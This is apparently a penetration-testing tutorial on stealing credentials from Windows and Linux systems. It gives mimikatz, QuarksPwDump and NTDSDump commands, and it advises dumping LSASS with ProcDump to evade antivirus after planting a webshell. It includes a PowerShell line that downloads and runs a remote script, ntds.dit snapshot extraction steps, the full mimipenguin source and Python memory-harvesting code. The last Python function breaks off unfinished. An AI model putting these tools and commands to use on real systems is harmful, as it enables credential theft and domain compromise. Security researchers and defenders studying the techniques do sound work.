On dumping system passwords


Windows systems:

0x01 Windows password hashes

 

     Early versions of SMB sent passwords over the network in the clear. Next came the "LAN Manager Challenge/Response" scheme, LM for short, which is so simple that it is easily broken. Microsoft then introduced the Windows NT challenge/response scheme, called NTLM, and today there are the newer NTLMv2 and Kerberos. The encrypted form of a Windows password is called a hash; by default a Windows account's stored password hash consists of two parts, an LM hash and an NT hash (commonly written NTLM hash). Note that since Windows Vista / Server 2008 the LM hash is no longer stored by default (the "Do not store LAN Manager hash value" policy), so on modern systems the LM field only holds the empty placeholder AAD3B435B51404EEAAD3B435B51404EE.

     Compared with the LM hash, the NT hash is case-sensitive, it no longer reveals whether the original password is shorter than 8 bytes, and it does away with the magic constant "KGS!@#$%". MD4 is a real one-way hash, so brute-forcing the plaintext that went into it is considerably harder. The problem is that while Microsoft stressed how strong the NT hash is, it glossed over the fact that, for backward compatibility, the NT hash was (on NT through XP / Server 2003) always stored alongside the LM hash. As long as that is the case, however strong the NT hash may be it adds nothing to security and in fact undermines it: an attacker first exploits the weakness of the LM hash to recover the case-insensitive version of the password, then uses the NT hash to fix up the case of the original plaintext.

 

Windows hashes are written in the pwdump format username:RID:LM-hash:NT-hash:::, for example:

Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::

which means

User name: Administrator

RID: 500

LM hash: C8825DB10F2590EAAAD3B435B51404EE

NT hash: 683020925C5D8569C23AA724774CE6CC

Two placeholder values are worth recognising on sight. AAD3B435B51404EE as either half of the LM field is the LM hash of an empty 7-byte block: when only the second half is empty, as above, the password is 7 characters or shorter; when both halves are empty no LM hash is stored at all. And 31D6CFE0D16AE931B73C59D7E0C089C0 in the NT field is the hash of an empty password.

Once you have a user's hashes, take the pair C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC to an online hash lookup site (or crack it locally with john or hashcat).
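As an added example (not code from the original article or from any of the tools it covers), the following Python helper parses a pwdump-format line such as the one above, points out what the placeholder values already reveal, and recomputes an NT hash (MD4 over the UTF-16LE encoding of the password) so that a candidate plaintext can be checked offline instead of being pasted into a lookup site. MD4 is implemented inline because hashlib's md4 is frequently unavailable under OpenSSL 3; the LM half is not computed here. The sample line is the one from the text, and the candidate check uses the NT hash of "password", a well-known test value.

```python
import struct

MASK = 0xFFFFFFFF
EMPTY_LM_HALF = "aad3b435b51404ee"              # LM hash of an all-NUL 7-byte block
EMPTY_LM = EMPTY_LM_HALF * 2                    # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # MD4("") = NT hash of the empty password


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _md4_round(v, f, X, ks, shifts, const):
    # Registers are updated in the order a, d, c, b; the other three feed f().
    for i, k in enumerate(ks):
        t = (-i) % 4
        x, y, z = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
        v[t] = _lrot((v[t] + f(x, y, z) + X[k] + const) & MASK, shifts[i % 4])


def md4(data):
    """RFC 1320 MD4 in pure Python (fast enough for checking a few candidates)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        v = state[:]
        _md4_round(v, F, X, range(16), (3, 7, 11, 19), 0)
        _md4_round(v, G, X, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15],
                   (3, 5, 9, 13), 0x5A827999)
        _md4_round(v, H, X, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15],
                   (3, 9, 11, 15), 0x6ED9EBA1)
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)), returned as lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump_line(line):
    """user:RID:LM:NT::: -> dict, with notes on what the hashes already give away."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError("not a pwdump line: %r" % line)
    user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
    notes = []
    if lm == EMPTY_LM:
        notes.append("no LM hash stored (Vista+/policy) or empty password")
    elif lm[16:] == EMPTY_LM_HALF:
        notes.append("LM second half empty: password is 7 characters or fewer")
    if nt == EMPTY_NT:
        notes.append("NT hash of the empty password")
    return {"user": user, "rid": rid, "lm": lm, "nt": nt, "notes": notes}


def check_candidate(nt_hex, candidate):
    """True if the candidate plaintext hashes to the given NT hash."""
    return nt_hash(candidate) == nt_hex.lower()


if __name__ == "__main__":
    sample = "Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::"
    rec = parse_pwdump_line(sample)
    print(rec["user"], rec["rid"], rec["notes"])
    print("NT('password') =", nt_hash("password"))
```

Because the LM half above tells us the password is at most 7 characters, and the NT hash is case-sensitive, the natural workflow is exactly the one the text describes: crack the short case-insensitive LM value first, then try the case variants of that result against the NT hash with check_candidate.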

 

0x02 QuarksPwDump

 

     The usual tool for grabbing password hashes across the whole Windows family is QuarksPwDump_v0.2b; the hashes it returns can be looked up at http://www.objectif-securite.ch/ophcrack.php.

     The QuarksPwDump command for dumping the local hashes is as follows (see the tool's help for the other options; it must be run with administrator privileges, since it reads the SAM through the registry):

quarkspwdump.exe -dhl

Take the whole hash output to the online cracker.

 

0x03 mimikatz

 

1. Commonly used commands

system::user        // show the currently logged-on user
process::list       // list processes
process::stop processname // kill a process (some processes cannot be killed even with enough privilege)
process::suspend  processname // suspend a process
process::modules      // list kernel modules and their paths on disk
service::list    // list system services
service::stop(start) service_name   // stop (start) a service
privilege::list   // list the privileges held by the current token
privilege::debug   // enable SeDebugPrivilege (the token must already hold it, i.e. run as administrator)
nogpo::cmd  // open cmd even where group policy disables it
nogpo::regedit // open the registry editor likewise
ts::sessions // show current terminal-server sessions
ts::processes  // show current processes and their PIDs
sekurlsa::logonpasswords   // dump the plaintext passwords and hashes of currently logged-on users from LSASS (needs SeDebugPrivilege)
lsadump::lsa /patch   // dump the NT hashes of every account stored on this machine (the SAM, or the whole domain when run on a DC)
inject::process lsass.exe 'path' sekurlsa.dll // process injection (with mimikatz 1.0, if the sekurlsa module is present you can inject the DLL into lsass and then dump the hashes)

Note that this list mixes mimikatz 1.x syntax (system::user, nogpo::cmd, nogpo::regedit, inject::process) with 2.x syntax (privilege::debug, sekurlsa::logonpasswords, lsadump::lsa /patch); in 2.x nogpo:: became misc::cmd / misc::regedit and the inject:: module was dropped because sekurlsa reads LSASS memory directly. Check the module list of the version you are running.

 

2. Usage

Let's try the credential-dumping tool mimikatz; the commands are:

privilege::debug
sekurlsa::logonpasswords

The result is shown in the screenshot below:

 

Notice that the LM hash dumped by mimikatz differs from the one dumped by QuarksPwDump, and that mimikatz recovered the plaintext system password outright, while the NT hashes reported by the two tools are identical. That is expected: sekurlsa::logonpasswords reads the credentials LSASS keeps in memory for the logged-on session, whereas QuarksPwDump reads the SAM on disk, which on Vista and later normally holds only the empty LM placeholder; the NT hash is the same in both places.

 

     A common situation in a penetration test: you already have a chopper webshell on the target, but the system has 360 Safeguard or some other security product installed, and both mimikatz and QuarksPwDump get flagged and deleted on upload. Running those two tools in the usual way to get the system hashes is therefore off the table. Instead, dump the memory of the target's LSASS process to a file, bring that file back to your own machine and process it there with mimikatz; that yields the target's hashes and passwords all the same.

     ProcDump can be downloaded from Microsoft's site (Sysinternals). Being a signed Microsoft tool it is not itself detected as malware by antivirus, but be aware that modern EDR products commonly alert on any process opening lsass.exe with memory-read access, ProcDump included.

The command is:

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

Screenshot:

 

 

Next, processing the dump locally with mimikatz:

First run:

mimikatz.exe "sekurlsa::minidump lsass.dmp"

Then run:

sekurlsa::logonpasswords

As you can see, the system password can be recovered offline, which sidesteps the antivirus on the target host.

Sometimes the plaintext cannot be recovered but the NT hash is still obtained; a site worth trying for cracking that hash:

https://www.objectif-securite.ch/ophcrack.php

The WooYun knowledge base also shows a PowerShell command that does the same job as ProcDump:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); "Get-Process lsass | Out-Minidump"

I tried this on a compromised host and it works too; chopper's virtual terminal shows an error, but the PowerShell code has actually executed successfully. Overall, though, ProcDump still feels more convenient to use.

     Metasploit also has mimikatz integrated; for a tutorial see http://www.offensive-security.com/metasploit-unleashed/Mimikatz

 

0x04 NTDSDump

 

Fed up with how slow NTDSXTract is, I modified quarkspwdump into an offline extraction tool that can read system.hiv.

ntds.dit is really just an ESENT (Extensible Storage Engine) database, and Microsoft itself ships a documented set of APIs (the Jet* functions in esent.dll) for working with it.

Its command line is:

ntdsdump.exe <-f ntds.dit> <-k HEX-SYS-KEY | -s system.hiv> [-o out.txt] [-h] [-t JOHN|LC]

-f    path to ntds.dit

-k   optional SYSKEY in hexadecimal

-s    optional path to system.hiv (used to derive the SYSKEY when -k is not given)

-h   also export password history

-t    output format, LC or JOHN

-o   write the output to the given file

 

The SYSKEY (boot key) is actually stored as the class names of several subkeys under HKLM\SYSTEM\CurrentControlSet\Control\Lsa (JD, Skew1, GBG and Data), which can be read with RegQueryInfoKey; the 16 bytes obtained by concatenating those four 8-hex-digit class strings are then de-scrambled with a fixed byte permutation to give the real key.

The attachment provides two extraction tools: getsyskey_c.exe is built with VC6 from getsyskey.cpp, which can be opened and compiled in VC6 directly.

getsyskey_cs.exe is built with .NET 2.0 from getsyskey.cs, which can be compiled directly with csc.

 

Known error:

JetAttachDatabase() failed

Cause: the database needs repair; run esentutl /p /o ntds.dit to repair it. /p is a lossy hard repair, so only ever run it on your copied file, never on a domain controller's live database.

 

Download:

ntdsdump

 

Also: after finishing the changes I looked at the quarkspwdump GitHub again and found that someone had submitted a pull request: https://github.com/quarkslab/quarkspwdump/pull/3

It adds the ability to load system.hiv by calling RegLoadKey. That API needs SeRestorePrivilege and SeBackupPrivilege, i.e. an elevated token that has passed UAC, which makes it awkward to use; reading the file directly, as this tool does, is much more straightforward.

 

SecPulse technique

On a 2008+ domain controller, use ntdsutil snapshot mount to export ntds.dit, SAM and SYSTEM:

ntdsutil
snapshot
activate instance ntds
create
mount {GUID}
copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit
unmount {GUID}
quit
quit
Then copy out whatever else you need. Note that copy is not an ntdsutil command: run it from a second cmd prompt while the snapshot is mounted (the mount command prints the mount point), and grab the SYSTEM hive at the same time, either Windows\System32\config\SYSTEM under the mount point or reg save HKLM\SYSTEM system.hiv, because the hashes in ntds.dit cannot be decrypted without it.

 

On the domain controller, use QuarksPwDump.exe to dump the domain hashes (hashes, not plaintext; QuarksPwDump does no plaintext recovery):

QuarksPwDump.exe --dump-hash-domain --output SecPulseHash.txt --ntds-file c:\ntds.dit

Downloading ntds.dit to your own machine and running QuarksPwDump there does not seem to work, mainly because you cannot point it at a SYSTEM hive file locally, so it cannot obtain the key (it reads the boot key from the live registry of the host it runs on).

 

QuarksPwDump usage parameters for reference:

quarks-pwdump.exe <options>

       Options :

       -dhl  --dump-hash-local

       -dhdc --dump-hash-domain-cached

       -dhd  --dump-hash-domain (NTDS_FILE must be specified)

       -db   --dump-bitlocker (NTDS_FILE must be specified)

       -nt   --ntds-file FILE

       -hist --with-history (optional)

       -t    --output-type JOHN/LC (optional, if no=>JOHN)

       -o    --output FILE (optional, if no=>stdout)

       Example: quarks-pwdump.exe --dump-hash-domain --with-history

 

Of course you can also download ntds.dit, SAM and SYSTEM (not very practical on large networks, where ntds.dit is often several GB) and decrypt them with some tool, but that feels heavy; now we can use NTDSDump.exe instead:

NTDSDump.exe -f ntds.dit -s SYSTEM -o SecPulseHash.txt

 

 

0x05 ShadowCopy+QuarksPwDump0.3a

1. Use the command-line version of ShadowCopy (vshadow.exe) with a batch file to copy ntds.dit to the current directory.

ShadowCopy.cmd (a cmd batch file; vshadow.exe re-invokes it as the callback script once the shadow copy exists):

setlocal
if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK
set SOURCE_DRIVE_LETTER=%SystemDrive%
set SOURCE_RELATIVE_PATH=\windows\ntds\ntds.dit
set DESTINATION_PATH=%~dp0
@echo ...Determine the scripts to be executed/generated...
set CALLBACK_SCRIPT=%~dpnx0
set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd
@echo ...Creating the shadow copy...
"%~dp0vshadow.exe" -script=%TEMP_GENERATED_SCRIPT% -exec="%CALLBACK_SCRIPT%" %SOURCE_DRIVE_LETTER%
del /f %TEMP_GENERATED_SCRIPT%
@goto :EOF
:IS_CALLBACK
setlocal
@echo ...Obtaining the shadow copy device name...
call %TEMP_GENERATED_SCRIPT%
@echo ...Copying from the shadow copy to the destination path...
copy "%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%" %DESTINATION_PATH%

 

Reference: http://blogs.msdn.com/b/adioltean/archive/2005/01/05/346793.aspx

2. Repair the copied database

esentutl /p /o ntds.dit

 

3. Have QuarksPwDump read it directly and write the result to a file

QuarksPwDump.exe -dhd -hist -nt ntds.dit -o log.txt

 

Tips:

QuarksPwDump.exe:Dump various types of Windows credentials without injecting in any process. 
Source download; builds directly in VS2010
https://github.com/quarkslab/quarkspwdump

 

Pitfall A:

COM call "m_pVssObject->InitializeForBackup()" failed.
The domain controller is 64-bit but you ran the 32-bit vshadow.exe.
Fix: install the Windows 7 SDK and use the 64-bit vshadow.exe (works on Win2008 and Win2012); default location: "C:\Program Files\Microsoft SDKs\Windows\v6.1\Bin\x64\vsstools\vshadow.exe"

Pitfall B:

Source download; builds directly in VS2010
https://github.com/quarkslab/quarkspwdump
The master branch shown on the project page is actually still version 0.2.
The real release (no build needed) is QuarksPwDump-0.3a.
The author's build still reports 0.2b when run, presumably an oversight, but it does not affect use; just check whether the -sf parameter is present to tell whether you have the new version.

 

Linux systems

mimipenguin, the credential-dumping tool for Linux

Project:

https://github.com/huntergregal/mimipenguin

Requirements:

root privileges (it reads other processes' memory through /proc/<pid>/mem)

Program source, mimipenguin.c (the project's C helper: it walks /proc looking for the gnome-keyring-daemon process and dumps the keyring; targets.h, gnomeKeyring.h and util.h are the project's own headers and are not reproduced here):

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <dirent.h>
#include <string.h>
#include <stdlib.h>

#include "targets.h"
#include "gnomeKeyring.h"
#include "util.h"

int processTarget(char *target)
{
    DIR *dir = NULL;
    struct dirent* de = 0;
    int pid = -1, ret = -1;
    int result = 0;
    FILE *fp = NULL;
    char cmdlineFile[MAX_PATH] = {0};
    char *taskName = NULL;
    size_t taskSize = 0;

    dir = opendir(PROC);
    if ( dir == NULL )
    {
        printf("[!] ERROR: Failed to open /proc\n");
        return -1;
    }

    while ((de = readdir(dir)) != 0 )
    {
        if ( !strcmp(de->d_name, ".") || !strcmp(de->d_name, ".."))
            continue;

        result = 0;
        result = sscanf(de->d_name, "%d", &pid);

        if ( result != 1)
            continue;
        memset(cmdlineFile, 0, MAX_PATH);
        snprintf(cmdlineFile, MAX_PATH-1, "%s/%d/cmdline", PROC, pid);

        if ( (fp = fopen(cmdlineFile, "r")) == NULL )
            continue; // likely lost the race with a process that just exited

        taskSize = 0;
        if ( getline(&taskName, &taskSize, fp) > 0 )
        {
            if ( strstr(taskName, GNOME_KEYRING_DAEMON) ) // gnome-keyring-daemon process
            {
                if ( gnomeKeyringDump(pid) < 0 )
                {
                    printf("  [!] ERROR: dumping passwords from keyring\n");
                    //goto CLEANUP;
                }
            }
        }
        if (taskName != NULL)
        {
            free(taskName);
            taskName = NULL;
        }

        if ( fp != NULL )
        {
            fclose(fp);
            fp = NULL;
        }
    }

    ret = 0;
    CLEANUP:
         if (taskName != NULL)
        {
            free(taskName);
            taskName = NULL;
        }

        if ( fp != NULL )
        {
            fclose(fp);
            fp = NULL;
        }
        closedir(dir);
        return ret;
}

int main()
{
    size_t numTargets = sizeof(g_targets)/sizeof(char*);

    if ( getuid() != 0 )
    {
        printf("[!] Must be root!\n");
        return -1;
    }

    for (int i=0; i <numTargets; i++)
    {
        processTarget(g_targets[i]);
    }
    return 0;
}
mimipenguin.sh (the main script):

#!/bin/bash

# Author: Hunter Gregal
# Github: /huntergregal Twitter: /huntergregal Site: huntergregal.com
# Dumps cleartext credentials from memory

#root check
if [[ "$EUID" -ne 0 ]]; then
    echo "Root required - You are dumping memory..."
    echo "Even mimikatz requires administrator"
    exit 1
fi

#Store results to cleanup later
export RESULTS=""

dump_pid ()
{
    system=$3
    pid=$1
    output_file=$2
    if [[ $system == "kali" ]]; then
        mem_maps=$(grep -E "^[0-9a-f-]* r" /proc/$pid/maps | egrep 'heap|stack' | cut -d' ' -f 1)
    else
        mem_maps=$(grep -E "^[0-9a-f-]* r" /proc/$pid/maps | cut -d' ' -f 1)
    fi
    while read -r memrange; do
        echo $memrange
        memrange_start=`echo $memrange | cut -d"-" -f 1`;
        memrange_start=`printf "%u\n" 0x$memrange_start`;
        memrange_stop=`echo $memrange | cut -d"-" -f 2`;
        memrange_stop=`printf "%u\n" 0x$memrange_stop`;
        memrange_size=$(($memrange_stop - $memrange_start));
        dd if=/proc/$pid/mem of=${output_file}.${pid} ibs=1 oflag=append conv=notrunc \
            skip=$memrange_start count=$memrange_size > /dev/null 2>&1
    done <<< "$mem_maps"
}

parse_pass ()
{
#$1 = DUMP, $2 = HASH, $3 = SALT, $4 = SOURCE

#If hash not in dump get shadow hashes
if [[ ! "$2" ]]; then
        SHADOWHASHES="$(cut -d':' -f 2 /etc/shadow | egrep '^\$.\$')"
fi

#Determine password potential for each word
while read -r line; do
    #If hash in dump, prepare crypt line
    if [[ "$2" ]]; then
        #get ctype
        CTYPE="$(echo "$2" | cut -c-3)"
        #Escape quotes, backslashes, single quotes to pass into crypt
        SAFE=$(echo "$line" | sed 's/\\/\\\\/g; s/\"/\\"/g; s/'"'"'/\\'"'"'/g;')
        CRYPT="\"$SAFE\", \"$CTYPE$3\""
        if [[ $(python -c "import crypt; print crypt.crypt($CRYPT)") == "$2" ]]; then
            #Find which user's password it is (useful if used more than once!)
            USER="$(grep "${2}" /etc/shadow | cut -d':' -f 1)"
            export RESULTS="$RESULTS$4            $USER:$line \n"
        fi
    #Else use shadow hashes
    elif [[ $SHADOWHASHES ]]; then
        while read -r thishash; do
            CTYPE="$(echo "$thishash" | cut -c-3)"
            SHADOWSALT="$(echo "$thishash" | cut -d'$' -f 3)"
            #Escape quotes, backslashes, single quotes to pass into crypt
            SAFE=$(echo "$line" | sed 's/\\/\\\\/g; s/\"/\\"/g; s/'"'"'/\\'"'"'/g;')
            CRYPT="\"$SAFE\", \"$CTYPE$SHADOWSALT\""
            if [[ $(python -c "import crypt; print crypt.crypt($CRYPT)") == "$thishash" ]]; then
                #Find which user's password it is (useful if used more than once!)
                USER="$(grep "${thishash}" /etc/shadow | cut -d':' -f 1)"
                export RESULTS="$RESULTS$4            $USER:$line\n"
            fi
        done <<< "$SHADOWHASHES"
    #if no hash data - revert to checking probability
    else
        if [[ $line =~ ^_pammodutil.+[0-9]$ ]]; then
            export RESULTS="$RESULTS[LOW]$4            $line\n"
        elif [[ $line =~ ^LOGNAME= ]]; then
            export RESULTS="$RESULTS[LOW]$4            $line\n"
        elif [[ $line =~ UTF-8 ]]; then
            export RESULTS="$RESULTS[LOW]$4            $line\n"
        elif [[ $line =~ ^splayManager[0-9]$ ]]; then
            export RESULTS="$RESULTS[LOW]$4            $line\n"
        elif [[ $line =~ ^gkr_system_authtok$ ]]; then
            export RESULTS="$RESULTS[LOW]$4            $line\n"
        elif [[ $line =~ [0-9]{1,4}:[0-9]{1,4}: ]]; then
            export RESULTS="$RESULTS[LOW]$4            $line\n"
        elif [[ $line =~ Manager\.Worker ]]; then
            export RESULTS="$RESULTS[LOW]$4            $line\n"
        elif [[ $line =~ /usr/share ]]; then
            export RESULTS="$RESULTS[LOW]$4            $line\n"
        elif [[ $line =~ /bin ]]; then
            export RESULTS="$RESULTS[LOW]$4            $line\n"
        elif [[ $line =~ \.so\.[0-1]$ ]]; then
            export RESULTS="$RESULTS[LOW]$4            $line\n"
        elif [[ $line =~ x86_64 ]]; then
            export RESULTS="$RESULTS[LOW]$4            $line\n"
        elif [[ $line =~ (aoao) ]]; then
            export RESULTS="$RESULTS[LOW]$4            $line\n"
        elif [[ $line =~ stuv ]]; then
            export RESULTS="$RESULTS[LOW]$4            $line\n"
        else
            export RESULTS="$RESULTS[HIGH]$4            $line\n"
        fi
    fi
done <<< "$1"
}

#Support Kali
if [[ $(uname -a | awk '{print tolower($0)}') == *"kali"* ]]; then
    SOURCE="[SYSTEM - GNOME]"
    #get gdm-session-worker [pam/gdm-password] process
    PID="$(ps -eo pid,command | sed -rn '/gdm-password\]/p' | awk 'BEGIN {FS = " " } ; { print $1 }')"
    #if exists aka someone logged into gnome then extract...
    if [[ $PID ]];then
        while read -r pid; do
            dump_pid "$pid" /tmp/dump "kali"
            HASH="$(strings "/tmp/dump.${pid}" | egrep -m 1 '^\$.\$.+$')"
            SALT="$(echo "$HASH" | cut -d'$' -f 3)"
            DUMP="$(strings "/tmp/dump.${pid}" | egrep '^_pammodutil_getpwnam_root_1$' -B 5 -A 5)"
            DUMP="${DUMP}$(strings "/tmp/dump.${pid}" | egrep '^gkr_system_authtok$' -B 5 -A 5)"
            #Remove dupes to speed up processing
            DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
            parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE" 
    
            #cleanup
            rm -rf "/tmp/dump.${pid}"
        done <<< "$PID"
    fi
fi

#Support Ubuntu
if [[ $(uname -a | awk '{print tolower($0)}') == *"ubuntu"* ]]; then
        SOURCE="[SYSTEM - GNOME]"
        #get /usr/bin/gnome-keyring-daemon process
        PID="$(ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk 'BEGIN {FS = " " } ; { print $1 }')"
    #if exists aka someone logged into gnome then extract...
    if [[ $PID ]];then
        while read -r pid; do
            dump_pid "$pid" /tmp/dump
            HASH="$(strings "/tmp/dump.${pid}" | egrep -m 1 '^\$.\$.+$')"
            SALT="$(echo "$HASH" | cut -d'$' -f 3)"
            DUMP=$(strings "/tmp/dump.${pid}" | egrep '^.+libgck\-1\.so\.0$' -B 10 -A 10)
            DUMP+=$(strings "/tmp/dump.${pid}" | egrep -A 5 -B 5 'libgcrypt\.so\..+$')
            #Remove dupes to speed up processing
            DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
            parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE" 
            #cleanup
            rm -rf "/tmp/dump.${pid}"
        done <<< "$PID"
    fi
fi

#Support VSFTPd - Active Users
if [[ -e "/etc/vsftpd.conf" ]]; then
        SOURCE="[SYSTEM - VSFTPD]"
        #get nobody /usr/sbin/vsftpd /etc/vsftpd.conf
        PID="$(ps -eo pid,user,command | grep vsftpd | grep nobody | awk 'BEGIN {FS = " " } ; { print $1 }')"
    #if exists aka someone logged into FTP then extract...
    if [[ $PID ]];then
        while read -r pid; do
            dump_pid "$pid" /tmp/vsftpd
            HASH="$(strings "/tmp/vsftpd.${pid}" | egrep -m 1 '^\$.\$.+$')"
            SALT="$(echo "$HASH" | cut -d'$' -f 3)"
            DUMP=$(strings "/tmp/vsftpd.${pid}" | egrep -B 5 -A 5 '^::.+\:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$')
            #Remove dupes to speed up processing
            DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
            parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
        done <<< "$PID"

        #cleanup
        rm -rf /tmp/vsftpd*
    fi
fi

#Support Apache2 - HTTP BASIC AUTH
if [[ -e "/etc/apache2/apache2.conf" ]]; then
        SOURCE="[HTTP BASIC - APACHE2]"
        #get all apache workers /usr/sbin/apache2 -k start
        PID="$(ps -eo pid,user,command | grep apache2 | grep -v 'grep' | awk 'BEGIN {FS = " " } ; { print $1 }')"
    #if exists aka apache2 running
    if [[ "$PID" ]];then
        #Dump all workers
        while read -r pid; do
            gcore -o /tmp/apache $pid > /dev/null 2>&1
            #without gcore - VERY SLOW!
            #dump_pid $pid /tmp/apache
        done <<< "$PID"
        #Get encoded creds
        DUMP="$(strings /tmp/apache* | egrep '^Authorization: Basic.+=$' | cut -d' ' -f 3)"
        #for each extracted b64 - decode the cleartext
        while read -r encoded; do
            CREDS="$(echo "$encoded" | base64 -d)"
            if [[ "$CREDS" ]]; then
                export RESULTS="$RESULTS$SOURCE            $CREDS\n"
            fi
        done <<< "$DUMP"
        #cleanup
        rm -rf /tmp/apache*
    fi
fi

#Support sshd - Search active connections for Sudo passwords
if [[ -e "/etc/ssh/sshd_config" ]]; then
    SOURCE="[SYSTEM - SSH]"
    #get all ssh tty/pts sessions - sshd: user@pts01
    PID="$(ps -eo pid,command | egrep 'sshd:.+@' | grep -v 'grep' | awk 'BEGIN {FS = " " } ; { print $1 }')"
    #if exists aka someone logged into SSH then dump
    if [[ "$PID" ]];then
        while read -r pid; do
            dump_pid "$pid" /tmp/sshd
            HASH="$(strings "/tmp/sshd.${pid}" | egrep -m 1 '^\$.\$.+$')"
            SALT="$(echo "$HASH" | cut -d'$' -f 3)"
            DUMP=$(strings "/tmp/sshd.${pid}" | egrep -A 3 '^sudo.+')
            #Remove dupes to speed up processing
            DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
            parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
        done <<< "$PID"
        #cleanup
        rm -rf /tmp/sshd.*
    fi
fi
#Output results to STDOUT
printf "MimiPenguin Results:\n"
printf "%b" "$RESULTS" | sort -u
unset RESULTS
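As an added example, not part of mimipenguin itself, the technique the script's dump_pid and parse_pass functions implement, done in Python: parse /proc/<pid>/maps for readable regions, read them through /proc/<pid>/mem, run a strings(1)-style scan, and pull the neighbours of an anchor pattern (the script's egrep -B/-A around a crypt hash or gkr_system_authtok). MAPS_SAMPLE and MEM_SAMPLE are constructed data so the parsing can be exercised without root; demo_self_scan plants a constructed secret in the current process and recovers it from /proc/self/mem, which needs no extra privilege. Verifying candidates against /etc/shadow with crypt(3) is left to the script.

```python
import re

# /proc/<pid>/maps line: "start-end perms offset dev inode [path]"
MAPS_LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+) ([rwxps-]{4}) \S+ \S+ \d+\s*(.*)$")

# Constructed sample of a maps file, to exercise the parser offline (not a real process)
MAPS_SAMPLE = """\
55d1c0000000-55d1c0021000 r--p 00000000 08:01 1234                       /usr/bin/gnome-keyring-daemon
55d1c0800000-55d1c0a00000 rw-p 00000000 00:00 0                          [heap]
7ffc3b5a0000-7ffc3b5c1000 rw-p 00000000 00:00 0                          [stack]
7ffc3b5f0000-7ffc3b5f4000 r--p 00000000 00:00 0                          [vvar]
7ffc3b5f4000-7ffc3b5f6000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
"""

# Constructed memory contents with the kind of neighbours mimipenguin keys on
MEM_SAMPLE = (b"\x00\x00libgck-1.so.0\x00\x00\x00$6$saltsalt$abcdefghijklmnopqrstuv"
              b"\x00\x00hunter2hunter2\x00\x00LOGNAME=root\x00")


def readable_regions(maps_text, anon_only=False):
    """Yield (start, end, path) for readable mappings, like dump_pid's grep over maps."""
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if not m or m.group(3)[0] != "r":
            continue
        start, end, path = int(m.group(1), 16), int(m.group(2), 16), m.group(4)
        if path in ("[vvar]", "[vsyscall]"):        # not readable through /proc/<pid>/mem (EIO)
            continue
        if anon_only and path not in ("", "[heap]", "[stack]"):
            continue                                 # skip file-backed code/data (the "kali" branch)
        yield start, end, path


def dump_regions(pid, regions, chunk=1 << 20):
    """Read the given ranges out of /proc/<pid>/mem (root or ptrace rights; 'self' always works)."""
    parts = []
    with open("/proc/%s/mem" % pid, "rb", buffering=0) as mem:
        for start, end, _ in regions:
            pos = start
            while pos < end:
                try:
                    mem.seek(pos)
                    data = mem.read(min(chunk, end - pos))
                except OSError:
                    break                            # region vanished or is an unreadable page
                if not data:
                    break
                parts.append(data)
                pos += len(data)
    return b"".join(parts)


def extract_strings(blob, min_len=8):
    """Equivalent of strings(1): runs of printable ASCII of at least min_len bytes."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def context_around(strs, anchor, before=5, after=5):
    """strings | egrep -B before -A after anchor: neighbours of every string matching anchor."""
    pat = re.compile(anchor)
    hits, seen = [], set()
    for i, s in enumerate(strs):
        if pat.search(s):
            for cand in strs[max(0, i - before): i + after + 1]:
                if cand not in seen:
                    seen.add(cand)
                    hits.append(cand)
    return hits


def harvest(pid, anchor, anon_only=True):
    """Dump a live process and return candidate strings near the anchor pattern."""
    with open("/proc/%s/maps" % pid) as f:
        regions = list(readable_regions(f.read(), anon_only=anon_only))
    return context_around(extract_strings(dump_regions(pid, regions)), anchor)


def demo_self_scan():
    """Plant a constructed secret in our own heap and recover it from /proc/self/mem."""
    marker = b"MIMI-DEMO-MARKER:"
    secret = marker + b"s3cr3t-p4ss"      # built at runtime, so it exists only in memory
    hits = harvest("self", r"^MIMI-DEMO-MARKER:")
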